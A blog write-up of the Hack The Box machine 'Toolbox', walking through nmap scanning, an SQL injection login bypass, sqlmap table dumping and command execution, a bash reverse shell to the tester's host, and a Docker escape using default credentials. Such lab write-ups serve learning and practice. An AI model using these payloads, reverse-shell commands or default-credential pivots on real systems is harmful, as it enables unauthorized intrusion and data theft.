HTB - Toolbox Writeup

Liam Geyer

👾 Machine Overview

This is a writeup of the machine Toolbox from HTB , it’s an easy difficulty Windows machine which featured SQL Injection, and breaking out of a docker container.

🔍 Enumeration

An initial nmap scan of the host gave the following results:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
nmap -sV -sC 10.129.96.171    
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-30 21:28 EDT
Nmap scan report for 10.129.96.171
Host is up (0.020s latency).
Not shown: 994 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
21/tcp open ftp FileZilla ftpd
| ftp-syst:
|_ SYST: UNIX emulated by FileZilla
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-r-xr-xr-x 1 ftp ftp 242520560 Feb 18 2020 docker-toolbox.exe
22/tcp open ssh OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey:
| 2048 5b:1a:a1:81:99:ea:f7:96:02:19:2e:6e:97:04:5a:3f (RSA)
| 256 a2:4b:5a:c7:0f:f3:99:a1:3a:ca:7d:54:28:76:b2:dd (ECDSA)
|_ 256 ea:08:96:60:23:e2:f4:4f:8d:05:b3:18:41:35:23:39 (ED25519)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
| ssl-cert: Subject: commonName=admin.megalogistic.com/organizationName=MegaLogistic Ltd/stateOrProvinceName=Some-State/countryName=GR
| Not valid before: 2020-02-18T17:45:56
|_Not valid after: 2021-02-17T17:45:56
|_http-title: MegaLogistics
445/tcp open microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: -6h57m55s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2024-05-30T18:30:22
|_ start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.04 seconds

Nmap detected anonymous FTP access, so I immediately wanted to check that out, I didn’t see any anonymous SMB.

📂 FTP

I connected to FTP with the logon anonymous:anonymous.

Anonymous FTP

There’s just an exe for docker toolbox, which gives us a good indication of what the webserver is probably running on. I don’t think there’s much to be done with the binary itself.

🌐 MegaLogistics

I checked out the site on port 80, and also added admin.megalogistic.com to my /etc/hosts file since it was identified in the nmap scan.

MegaLogistics Homepage

The main site doesn’t have much of interest, I fuzzed for directories and checked out the contact form but nothing was too juicy.

Migrating over to admin.megalogistic.com, we’re presented with an admin sign in portal.

Admin Login

We don’t have any creds, and forgot password didn’t lead to anything.

I tried some generic admin:admin combinations and so on but wasn’t able to guess the login, so I tried some special characters to see if there’s any kind of injection we can attempt.

':' generated an error message, so I ran sqlmap to try and get some payloads to bypass the login page.

SQLMap Output

The third payload it identified worked to bypass the login

1
username=SltW';SELECT PG_SLEEP(5)--&password=tWZd

We’re presented with a dashboard that’s not super useful, I think the notes are pretty much just red herrings.

Admin Dashboard

I decided to go back to sqlmap to see if we can get command execution or dump any interesting information as a result of the SQL injection.

First I captured a login request in burp and saved it to login.request for use with sqlmap.

Burp Logon Request

Next, I tried to dump public tables from the database.

1
sqlmap -r login.request --force-ssl --batch --dbs --tables -D public

Listing Tables

This enumerated the users table, so next I tried dumping that.

1
sqlmap -r login.request --force-ssl --batch --dbs --tables -D public -T users --dump

Dumping the users table
That did get me a hash for the admin user, but I wasn’t really sure what to do with it. I then tried to see if we could execute commands using --os-command whoami.

Testing Command Execution

Looks like it’s running as the postgres user, after some fiddling I was able to pop a reverse shell with bash -c "bash -i >& /dev/tcp/10.10.14.3/6969 0>&1" as my payload.

Shell as postgres

🥇 Root

First I stabilized the shell using python.

1
python3 -c 'import pty;pty.spawn("bash")'

We know that we’re dealing with docker toolbox somewhere, some research shows docker:tcuser as the default credentials.

The postgres box seemed really empty, and it doesn’t look to be a docker container. ip a shows that our IP is 172.17.0.2, after getting stuck for a while I decided to check for other hosts and found .1.

I attempted to login to that host with the default credentials for docker toolbox.

SSHing into Docker

We’re able to login, and we’re able to run sudo su! I started rooting around and found the /c directory, which had the entire host filesystem mounted.

Grabbing the Flag

After grabbing the flag, I uploaded my SSH key to .ssh/authorized_keys so I could actually log in to the host machine.

Shell as Administrator

  • Title: HTB - Toolbox Writeup
  • Author: Liam Geyer
  • Created at : 2024-07-26 00:00:00
  • Updated at : 2024-10-10 09:01:47
  • Link: https://lfgberg.org/2024/07/26/htb/toolbox/
  • License: This work is licensed under CC BY-NC-SA 4.0.